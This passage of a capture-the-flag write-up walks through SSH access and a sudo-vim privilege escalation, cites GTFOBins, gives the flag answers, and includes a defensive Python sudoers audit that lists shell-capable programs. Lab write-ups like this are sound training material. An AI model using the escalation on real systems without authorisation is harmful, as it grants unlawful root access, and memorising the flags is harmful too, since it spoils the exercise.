Trying SSH, we need a username and password; let's try Mitch and our newly obtained password.

ssh mitch@10.10.127.163 -p 2222 - remember that we have to use port 2222 because SSH is not running on port 22 on this box. Using the password we got earlier, we can successfully log in.

ssh

That shows us that the password can be used with SSH.


What's the user flag?

We can see one file in the directory we start in, which is Mitch's home directory. Reading the file gives us the flag: G00d j0b, keep up!

user flag


Is there any other user in the home directory? What's its name?

If you run ls /home, you can see another user named sunbath.


What can you leverage to spawn a privileged shell?

If you run the command sudo -l, it will show you what the user can run as root, and whether it requires a password:

sudo -l command

This shows us that Mitch may run /usr/bin/vim (Vim) without a password.
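This is the same class of mistake as the (ALL) NOPASSWD: ALL entry for www-data in the Pickle Rick write-up, just narrowed to one program. As an added example (my code, not part of either room), here is a small sudoers audit that parses user-specification lines, the rules sudo -l summarises for one user, and rates each entry: password-less ALL is critical, and password-less access to an editor, pager or interpreter that can hand back a shell (the kind of program GTFOBins catalogues) is high. The sudoers fragment and the list of shell-capable programs are constructed; the two NOPASSWD lines are the ones the two write-ups found.

```python
import os
import re
from typing import Dict, List

# Programs that give the caller an interactive shell or arbitrary file access once they run
# as root. A short constructed list in the spirit of GTFOBins, not an exhaustive one.
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "man", "find", "awk", "perl",
                 "python", "python3"}

# user-or-%group  host = (runas) [TAG: ...] command[, command...]
USER_SPEC = re.compile(
    r"^(?P<user>[%#+]?[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG = re.compile(r"^(?P<tag>[A-Z]+):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias",
                 "@include", "#include")


def parse_sudoers(text: str) -> List[Dict]:
    """Parse user-specification lines of a sudoers file. Defaults, alias and include lines
    are skipped and comments are stripped; aliases are not expanded."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP_PREFIXES) or line.startswith("#"):
            continue
        line = re.sub(r"\s+#.*$", "", line)  # trailing comment
        m = USER_SPEC.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = []
        while (t := TAG.match(rest)):
            tags.append(t.group("tag"))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        entries.append({"user": m.group("user"), "host": m.group("host"),
                        "runas": m.group("runas") or "root",
                        "tags": tags, "commands": commands})
    return entries


def audit(entries: List[Dict]) -> List[Dict]:
    """Rate each entry. Severity mirrors what the two write-ups found:
      critical: NOPASSWD on ALL (www-data on Pickle Rick: sudo -i is one command away)
      high:     NOPASSWD on a shell-capable program (mitch and vim here)
      medium:   ALL with a password still required
      info:     specific programs that are not shell-capable
    """
    results = []
    for e in entries:
        nopasswd = "NOPASSWD" in e["tags"]
        names = {os.path.basename(c.split()[0]) for c in e["commands"]}
        escapes = names & SHELL_CAPABLE
        if "ALL" in names and nopasswd:
            sev, why = "critical", "any command without a password"
        elif nopasswd and escapes:
            sev, why = "high", "password-less " + ", ".join(sorted(escapes)) + " can spawn a root shell"
        elif "ALL" in names:
            sev, why = "medium", "any command, password required"
        else:
            sev, why = "info", "specific command(s): " + ", ".join(sorted(names))
        results.append({"user": e["user"], "runas": e["runas"], "severity": sev, "reason": why})
    return results


# Constructed fragment; the two NOPASSWD lines are what sudo -l reported on the two boxes.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
mitch    ALL=(root) NOPASSWD: /usr/bin/vim
alice    ALL=(ALL) ALL
%admin   ALL=(ALL) /usr/bin/apt update, /usr/bin/apt upgrade  # package updates only
"""

if __name__ == "__main__":
    for r in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{r['severity']:8} {r['user']:10} {r['reason']}")
```

The fix for the high finding is not to take vim away but to drop the NOPASSWD tag or, better, to grant a wrapper that does the one job needed; an editor run as root will always be able to open a shell or write any file.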


What's the root flag?

Head over to GTFOBins, a great list of Unix binaries that can be used for privilege escalation. Type "vim" into the search bar (because we know vim can be run as a superuser) and click on "Sudo".

vim sudo

Run this command in the SSH shell and you will become root:

becoming root

Congrats! You are now root simply because of a misconfigured sudo rule for vim.

root

The flag is W3ll d0n3. You made it!!

Happy hacking 🙂